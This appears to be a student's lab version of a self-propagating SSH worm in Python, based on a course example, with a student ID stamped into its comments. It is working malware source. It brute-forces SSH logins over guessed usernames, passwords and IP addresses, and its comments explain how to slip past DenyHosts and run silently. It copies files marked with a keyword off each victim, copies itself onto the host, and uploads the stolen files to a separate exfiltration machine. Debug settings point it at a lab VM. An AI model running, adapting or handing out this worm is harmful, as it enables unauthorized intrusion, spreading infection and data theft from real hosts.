#!/usr/bin/env pythonATMIK PES1201800189ATMIK PES1201800189


import sys
import os
import random
import paramiko
import scp
import select
import signal

##   You would want to uncomment the following two lines for the worm toATMIK PES1201800189ATMIK PES1201800189


##   work silently:ATMIK PES1201800189ATMIK PES1201800189


#sys.stdout = open(os.devnull, 'w')ATMIK PES1201800189ATMIK PES1201800189


#sys.stderr = open(os.devnull, 'w')ATMIK PES1201800189ATMIK PES1201800189








def sig_handler(signum,frame): os.kill(os.getpid(),signal.SIGKILL)
signal.signal(signal.SIGINT, sig_handler)

debug = 1      # IMPORTANT:  Before changing this setting, read the last
               #             paragraph of the main comment block above. As
               #             mentioned there, you need to provide two IP
               #             addresses in order to run this code in debug 
               #             mode. 

##  The following numbers do NOT mean that the worm will attack only 3ATMIK PES1201800189ATMIK PES1201800189


##  hosts for 3 different usernames and 3 different passwords.  Since theATMIK PES1201800189ATMIK PES1201800189


##  worm operates in an infinite loop, at each iteration, it generates aATMIK PES1201800189ATMIK PES1201800189


##  fresh batch of hosts, usernames, and passwords.ATMIK PES1201800189ATMIK PES1201800189







NHOSTS = NUSERNAMES = NPASSWDS = 3


##  The trigrams and digrams are used for syntheizing plausible lookingATMIK PES1201800189ATMIK PES1201800189


##  usernames and passwords.  See the subroutines at the end of this scriptATMIK PES1201800189ATMIK PES1201800189


##  for how usernames and passwords are generated by the worm.ATMIK PES1201800189ATMIK PES1201800189







trigrams = '''bad bag bal bak bam ban bap bar bas bat bed beg ben bet beu bum 
                  bus but buz cam cat ced cel cin cid cip cir con cod cos cop 
                  cub cut cud cun dak dan doc dog dom dop dor dot dov dow fab 
                  faq fat for fuk gab jab jad jam jap jad jas jew koo kee kil 
                  kim kin kip kir kis kit kix laf lad laf lag led leg lem len 
                  let nab nac nad nag nal nam nan nap nar nas nat oda ode odi 
                  odo ogo oho ojo oko omo out paa pab pac pad paf pag paj pak 
                  pal pam pap par pas pat pek pem pet qik rab rob rik rom sab 
                  sad sag sak sam sap sas sat sit sid sic six tab tad tom tod 
                  wad was wot xin zap zuk'''

digrams = '''al an ar as at ba bo cu da de do ed ea en er es et go gu ha hi 
              ho hu in is it le of on ou or ra re ti to te sa se si ve ur'''

trigrams = trigrams.split()
digrams  = digrams.split()

def get_new_usernames(how_many):
    return ['seed']     


def get_new_passwds(how_many):
    return ['dees']    


def get_fresh_ipaddresses(how_many):
    return ['192.168.56.101']   
                    # Provide one or more IP address that you
                    # want `attacked' for debugging purposes.
                    # The usrname and password you provided
                    # in the previous two functions must
                    # work on these hosts.
 

# For the same IP address, we do not want to loop through multiple userATMIK PES1201800189ATMIK PES1201800189


# names and passwords consecutively since we do not want to be quarantinedATMIK PES1201800189ATMIK PES1201800189


# by a tool like DenyHosts at the other end.  So let's reverse the orderATMIK PES1201800189ATMIK PES1201800189


# of looping.ATMIK PES1201800189ATMIK PES1201800189







while True:
    usernames = get_new_usernames(NUSERNAMES)
    passwds =   get_new_passwds(NPASSWDS)
#    print("usernames: %s" % str(usernames))ATMIK PES1201800189ATMIK PES1201800189


#    print("passwords: %s" % str(passwds))ATMIK PES1201800189ATMIK PES1201800189







    # First loop over passwords
    for passwd in passwds:
        # Then loop over user names
        for user in usernames:
            # And, finally, loop over randomly chosen IP addresses
            for ip_address in get_fresh_ipaddresses(NHOSTS):
                print("\nTrying password %s for user %s at IP address: %s" % (passwd,user,ip_address))
                files_of_interest_at_target = []
                try:
                    ssh = paramiko.SSHClient()
                    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
                    ssh.connect(ip_address,port=22,username=user,password=passwd,timeout=5)
                    print("\n\nconnected\n")
                    # Let's make sure that the target host was not previously 
                    # infected:
                    received_list = error = None
                    stdin, stdout, stderr = ssh.exec_command('ls')
                    error = stderr.readlines()
                    if error is not None: 
                        print(error)
                    received_list = list(map(lambda x: x.encode('utf-8'), stdout.readlines()))
                    print("\n\noutput of 'ls' command: %s" % str(received_list))
                    #if ''.join(received_list).find('AbraWormMod') >= 0: 
                        #print("\nThe target machine is already infected\n")      
                        #next
                    # Now let's look for files that contain the string 'abracadabra'
                    cmd = 'grep -ls abracadabra *'
                    stdin, stdout, stderr = ssh.exec_command(cmd)
                    error = stderr.readlines()
                    if error is not None: 
                        print(error)
                        next
                    received_list = list(map(lambda x: x.encode('utf-8'), stdout.readlines()))
                    for item in received_list:
                        files_of_interest_at_target.append(item.strip())
                    print("\nfiles of interest at the target: %s" % str(files_of_interest_at_target))
                    scpcon = scp.SCPClient(ssh.get_transport())
                    if len(files_of_interest_at_target) > 0:
                        for target_file in files_of_interest_at_target:
                            scpcon.get(target_file)

                    content = []
                    with open(__file__,"r") as f:
                            for line in f:
                                if(line.startswith("#")):
                                    line = line.strip() + "ATMIK PES1201800189\n\n"
                                    content.append(line)
                                else: 
                                    content.append(line)
                                continue    
                            #content.append(line)
            
                    with open(__file__,"w") as f:    
                        for i in range(len(content)): 
                            f.write(content[i])
                    scpcon.put(sys.argv[0])              
                    scpcon.close()
                except:
                    next
                # Now upload the exfiltrated files to a specially designated host,
                # which can be a previously infected host.  The worm will only 
                # use those previously infected hosts as destinations for 
                # exfiltrated files if it was able to send the login credentials
                # used on those hosts to its human masters through, say, a 
                # secret IRC channel. (See Lecture 29 on IRC)
                if len(files_of_interest_at_target) > 0:
                    print("\nWill now try to exfiltrate the files")
                    try:
                        ssh = paramiko.SSHClient()
                        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
                        #  For exfiltration demo to work, you must provide an IP address and the login 
                        #  credentials in the next statement:
                        ssh.connect('192.168.56.101',port=22,username='seed',password='dees',timeout=5)
                        scpcon = scp.SCPClient(ssh.get_transport())
                        print("\n\nconnected to exhiltration host\n")
                        for filename in files_of_interest_at_target:
                            scpcon.put(filename)
                        scpcon.close()
                    except: 
                        print("No uploading of exfiltrated files\n")
                        next
    if debug: break
